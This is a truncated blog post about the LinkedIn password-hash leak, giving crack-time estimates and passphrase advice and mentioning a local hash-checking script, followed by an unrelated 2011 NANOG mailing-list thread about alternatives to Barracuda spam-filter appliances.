LinkedIn Hash: 0de2528855f02cf9ed04c217a15c61b35657

To crack this pass-phase using the following systems it would take the 
the associated amount of time:


$180,000 cracker it would take roughly 2 decades, 7 years to complete 
the crack

$900 cracker it would take 3 centuries, 3 decades to complete the crack
Average graphics card it would take 15 centuries to complete the crack
Average desktop computer would take 795 centuries to complete the crack

Now what does this mean in the schema of things.  You cannot trust any 
website, third party identity verification, one time password, etc.  You 
can only trust yourself in creating a password that even if dumped will 
make it nearly impossible to crack.  Use some form of nomenclature to 
identify a website separate from the base pass-phrase, thus giving you 
individual "passwords" and in turn if one site gets dumped the others 
remain safe.


Practicality is more along the lines of what the solution is.  It is not 
practical to develop an pub/priv solution because of the user 
themselves, it is however practical to educate everyone we meet, 
preaching to them how to make simple changes can increase their 
protection ten fold.


A similar question though comes from "Website xyz.com was just dumped, 
how do I know if my password was in this group?".  Just from previous 
experience, organizations release the warning stating they had a breach, 
but it normally takes a good bit of time, as seen with LinkedIn, for 
them to release who was part of this dump.  If they ever really do, 
sometimes it becomes a blanket "We were breached please change your 
password." story.  If a website you have been using is breached then I 
revert back to the original statement saying that the issue becomes 
trust.  In the early days of LinkedIn websites claiming to check your 
password against the database dump were popping up left and right.  Is 
it truly wise to jump to these sites and put your password, which 
potentially will take decades to crack, into a website that claims to 
check it without storing that password anywhere.  I know there are sites 
which were created by companies and individuals with outstanding 
reputations, however it was outside my control and thus not trusted.  I 
decided to write a small, very simple, Python script that will run on 
your local machine and allow you to check your password against the dump 
of hashes.  Right now it only does the LinkedIn dumps, but my goal is to 
do any dump all you have to do is point it to the file.  I also then 
decided to take a little longer on the next release and learn to code in 
a GUI for users who may not be a techie.  I will continue to work on the 
GUI release, but if you want to get that release email me and I'll make 
sure you are aware of its release.


Until then I hope this helps those who

Re: Barracuda Networks is at it again: Any Suggestions as to an Alternative?

2011-04-13 Thread AP NANOG

I would look into Asatro, they have a solid product and good support.

If you want a contact person let me know and I will email you directly.

On 4/9/11 11:55 AM, pr...@cnsny.net wrote:

Andrew,
We use and offer Postini - a front end service.  Postini is a anti virus and 
spam filter, and can spool mail if your circuits are  down.  Postini is a 
Google company and works like a charm.  If you need more information please 
contact me offline pr...@cnsny.net

Paul

Sent from my Verizon Wireless Phone

- Reply message -
From: "Andrew Kirch"
Date: Sat, Apr 9, 2011 10:39 am
Subject: Barracuda Networks is at it again: Any Suggestions as to   an  
Alternative?
To: "John Palmer (NANOG Acct)",

John,

My suggestion isn't _QUITE_ an appliance, but it works very well and
I've been exceptionally happy with it.  It's a distribution of linux
controlled via a web interface that does far more than just mail
filtering (at which it is both flexible and adept).  Take a look at
http://www.clearfoundation.com/Software/overview.html.  The hardware
requirements shouldn't be too insane, and the rules
updates/subscriptions for the various services are all month to month,
and not a bucket of insane.

Andrew


On 4/8/2011 11:51 PM, John Palmer (NANOG Acct) wrote:

OK, its been a year since my Barracuda subscription expired. The unit
still stops some spam. I figured that I would go and see what they
would do if I tried to renew my subscription EXACTLY one year after it
expired. Would their renewal website say "Oh, you are at your
anniversary date", and renew me for a year?

No such luck: They want me to PAY FOR AN ENTIRE YEAR for which I did
NOT receive service and then for the current (upcoming year). Sorry -
I don't allow myself to be ripped off like that. Sorry Barracuda - you
get no money from me and I'll tell everyone I know about this policy
of yours.

I posted an article about this unscrupulous practice on my blog last
year at http://www.john-palmer.net/wordpress/?p=46

My question is - does anyone have any suggestions for another e-mail
appliance like the Barracuda Spam Firewall that doesn't try to charge
their customers for time not used. I should be able to shut off the
unit for a year or whatever and simply renew from the point that I
re-activate the unit instead of having to pay for back-years that I
didn't use.

Thanks